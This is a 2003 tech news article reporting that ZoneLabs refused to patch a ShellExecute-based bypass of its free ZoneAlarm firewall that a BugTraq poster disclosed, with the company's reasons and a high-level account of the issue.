ZoneLabs Won't Fix Hole In Free Firewall
July 1, 2003
By: Mark Hachman

ZoneLabs said it will not fix a vulnerability found in the freeware version of its ZoneAlarm firewall. The company said the vulnerability was a problem found in Windows, not its firewall, and that it would require the hacker equivalent of "brain surgery" to exploit.
Instead, ZoneLabs executives said that the vulnerability could be protected against by using one of its paid products: ZoneAlarm Plus, ZoneAlarm Pro, or its Integrity enterprise system.

According to the posting to the BugTraq mailing list, the vulnerability involves the Windows shell32.dll file, which can invoke the ShellExecute function. When one of the parameters of ShellExecute is set to a Web address, the web browser is prompted to access the web site in question -- and, under most ZoneAlarm configurations, is allowed to freely access web sites without the express permission of the user.

According to the poster, "aceh", that browser could quickly access a malicious web site, funnel a short string of confidential information (such as a username and password) and quickly redirect itself to an innocuous and trusted web site.

Although not stated expressly, the vulnerability appears to first require a Trojan to be loaded onto the user's machine via an email virus or some other means. However, "aceh" concluded that the vulnerability is common to all of the freeware versions of ZoneAlarm. Executives at ZoneLabs, however, said that the free version of ZoneAlarm provides adequate protection.

http://www.securityfocus.com/archive/1/326371

http://www.extremetech.com/print_article/0,3998,a=44172,00.asp